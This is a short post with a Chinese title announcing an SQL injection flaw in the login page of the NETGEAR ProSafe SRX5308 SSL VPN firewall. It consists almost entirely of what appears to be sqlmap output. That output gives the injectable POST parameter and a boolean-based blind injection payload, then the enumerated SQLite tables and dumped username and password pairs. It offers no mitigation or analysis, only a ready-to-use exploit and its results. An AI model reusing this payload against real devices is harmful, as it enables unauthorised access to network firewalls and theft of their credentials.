NETGEAR ProSafe WAN SSL VPN 防火墙 SQL注入漏洞
代码语言:javascript复制NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://192.168.1.1/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[ ] SQLite_masterdb
Database: SQLite_masterdb
[4 tables]
----------
| system |
| logging |
| services |
| zones |
----------
passwd and shadow encryption cracked
---------------------
| username | password |
---------- ----------
| showid | password |
---------- ----------
| guest | password |
---------- ---------- 
